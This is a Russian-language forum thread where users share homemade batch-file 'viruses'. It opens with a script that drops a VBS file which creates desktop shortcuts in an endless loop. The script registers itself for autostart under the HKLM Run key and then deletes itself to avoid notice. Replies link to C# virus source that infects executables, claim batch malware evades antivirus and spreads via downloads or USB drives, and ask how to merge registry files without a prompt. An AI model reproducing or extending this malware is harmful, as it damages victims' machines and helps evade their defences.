echo Set S = CreateObject("Wscript.Shell") >>"C:\Program Files\Internet Explorer\WINDCDPatch.vbs"
echo do >>"C:\Program Files\Internet Explorer\WINDCDPatch.vbs"
echo set WshShell = WScript.CreateObject("WScript.Shell") >>"C:\Program Files\Internet Explorer\WINDCDPatch.vbs"
echo strDesktop = WshShell.SpecialFolders("Desktop") >>"C:\Program Files\Internet Explorer\WINDCDPatch.vbs"
echo set objShellLink = WshShell.CreateShortcut(strDesktop & "\MyProgram.lnk") >>"C:\Program Files\Internet Explorer\WINDCDPatch.vbs"
echo objShellLink.TargetPath = "C:\PathToYourProgram\YourProgram.exe" >>"C:\Program Files\Internet Explorer\WINDCDPatch.vbs"
echo objShellLink.WindowStyle = 0 >>"C:\Program Files\Internet Explorer\WINDCDPatch.vbs"
echo objShellLink.Hotkey = "G" >>"C:\Program Files\Internet Explorer\WINDCDPatch.vbs"
echo objShellLink.IconLocation = "YourProgram.exe, 1" >>"C:\Program Files\Internet Explorer\WINDCDPatch.vbs"
echo objShellLink.Description = "My Program Shortcut" >>"C:\Program Files\Internet Explorer\WINDCDPatch.vbs"
echo objShellLink.WorkingDirectory = "C:\PathToYourProgram" >>"C:\Program Files\Internet Explorer\WINDCDPatch.vbs"
echo objShellLink.Save >>"C:\Program Files\Internet Explorer\WINDCDPatch.vbs"
echo loop >>"C:\Program Files\Internet Explorer\WINDCDPatch.vbs"
*//Добовляем в файл WINCDPatch.bat Запуск создания ярлыков
echo start "C:\Program Files\Internet Explorer\WINDCDPatch.vbs" >>"C:\Program Files\Internet Explorer\WINCDPatch.bat"
*//Дабавляем файл WINCDPatch.bat в автозагрузку
REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v WINCDPatch /t REG_SZ /d C:\Program Files\Internet Explorer\WINCDPatch.bat
*//Удаляем этот файл (палево)
del %0
exit
|
|
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2010-02-07 00:52:58.413333
|
|
|
ZnakVoprosa
Сообщений: 37
Оценки: 0
Присоединился: 2010-01-31 19:36:50.236666
|
я не понимая прикола .BAT вирусов они же не жызнеспособны (тоесть не могут плодится)
писать лутше на нормальном языке типа c# или Delphi с использованием WinApi
если интересно вот ссылочка на исходник вируса на c# (работает только под .net)
он токо заражает exe-шники и записывается в автозапуск
http://letitbit.net/download/5825.fa55193fe0019efc1dc0dfee7/simple_vir_on_c_.rar.html
|
|
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2010-02-07 08:12:28.326666
|
|
|
Ltonid
Сообщений: 4970
Оценки: 740
Присоединился: 2008-12-29 13:21:56.166666
|
quote:
ORIGINAL: ZnakVoprosa
я не понимая прикола .BAT вирусов они же не жызнеспособны (тоесть не могут плодится)
писать лутше на нормальном языке типа c# или Delphi с использованием WinApi
если интересно вот ссылочка на исходник вируса на c# (работает только под .net)
он токо заражает exe-шники и записывается в автозапуск
http://letitbit.net/download/5825.fa55193fe0019efc1dc0dfee7/simple_vir_on_c_.rar.html
1. bat не паляться антивирусами при правильном подходе, никогда не палятся.
2. Вирусы плодяться такими же простыми методами что и команды в бат. Например загрузка с сервера или копирование на флешку, все это можно реализовать в bat.
Да и bat to exe ваще никто не отменял.
|
|
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2010-02-07 13:53:12.946666
|
|
|
CeNT
Сообщений: 201
Оценки: 0
Присоединился: 2007-12-25 14:35:58.483333
|
Это не вирусы а дерьмо.Уровень школоты!
|
|
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2010-02-07 13:59:32.830000
|
|
|
rgo
Сообщений: 7170
Оценки: 281
Присоединился: 2004-09-25 05:14:25
|
quote:
ORIGINAL: CeNT
Это не вирусы а дерьмо.Уровень школоты!
Ты можешь написать лучше? Покажи нам свой код, мы с громадным удовольствием оценим.
|
|
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2010-02-11 19:36:50.236666
|
|
|
Мустанг92
Сообщений: 148
Оценки: 0
Присоединился: 2010-01-20 22:36:50.793333
|
Вопрос не в тему,но как какую команду нужно использовать,чтобы при слиянии рег файла с реестром,не требовалось подтверждение?!
|
|
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2010-02-15 18:17:10.973333
|
|
|
Мечтающий
Сообщений: 11
Оценки: 0
Присоединился: 2008-12-08 14:59:43.646666
|
quote:
ORIGINAL: CeNT
Это не вирусы а дерьмо.Уровень школоты!
Было тяжелое детство?)
|
|
|
|
|
|
